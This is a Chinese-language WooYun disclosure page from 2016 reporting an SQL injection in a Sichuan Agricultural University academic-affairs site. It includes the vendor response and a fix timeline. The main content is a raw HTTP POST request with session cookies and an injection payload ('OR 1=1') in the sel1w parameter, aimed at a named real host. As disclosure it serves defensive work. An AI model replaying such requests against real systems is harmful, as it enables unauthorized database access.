当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177414

漏洞标题:四川农业大学某站存在SQL注入漏洞

相关厂商:四川农业大学

漏洞作者: 路人甲

提交时间:2016-02-22 11:00

修复时间:2016-03-04 15:56

公开时间:2016-03-04 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-22: 细节已通知厂商并且等待厂商处理中
2016-02-23: 厂商已经确认,细节仅向厂商公开
2016-03-04: 细节向核心白帽子及相关领域专家公开
2016-03-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

POST /web/web/lanmu/tklist.asp HTTP/1.1
Content-Length: 737
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jiaowu.sicau.edu.cn
Cookie: ASPSESSIONIDSSATDARA=FFMAGDODGBDNCMDHLBFIAFCK; senfen=; jcrj%5Fxueqi=2015%2D2016%2D1; jcrj%5Fid=1581933856; jcrj%5Fuser=web; jcrj%5Fpwd=web; jcrj%5Fauth=True; jcrj%5Fsession=jwc%5Fcheck%2Cauth%2Cid%2Cxueqi%2Ctymfg%2Csf%2Cjwc%5Fcheck%2Cuser%2Cpwd%2Cbaoid%2Cjs%5Fjc%2Cjs%5Frq%2Cbianhao%2Cjihuanianji%2C; jcrj%5Fjwc%5Fcheck=y; jcrj%5Fsf=%D1%A7%C9%FA; jcrj%5Ftymfg=%C0%B6%C9%AB%BA%A3%CC%B2; jcrj%5Fbaoid=3642694354; jcrj%5Fjs%5Frq=1; jcrj%5Fjs%5Fjc=2; jcrj%5Fjihuanianji=2011; jcrj%5Fbianhao=%B9%A4%B3%CC%B9%DC%C0%ED2011
Host: jiaowu.sicau.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
bh=8996328181347053886467058199759489961391&h=%b5%f7%cd%a3%bf%ce%b2%e9%d1%af&id=0&jsj=&kl=&ku=&m=&o=id%20desc&p=100&picha=yes&rig=%ce%de&rul=%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4%2cs%ca%c7%b7%f1%2c%ce%c4%2c%ce%c4%2c%ce%c4%2c%ce%c4&sel1w=-1' OR 1=1* or 'x7uQ4H2x'=' &sel2w=%c8%ab%b2%bf&selw=%c8%ab%b2%bf&sw1=&twid=1000&vrul=y%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy%2cy&w1=%d1%a7%c6%da%3d'2015-2016-1'%20and%20%ca%c7%b7%f1%c9%f3%ba%cb%3d'%ca%c7'&w2=&wid=50%2c50%2c50%2c80%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50%2c50&ww=1&xuangai=&y=1&zh=

7.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-02-23 10:49

厂商回复:

已通知相关单位,正在处理

最新状态:

2016-03-04:已修复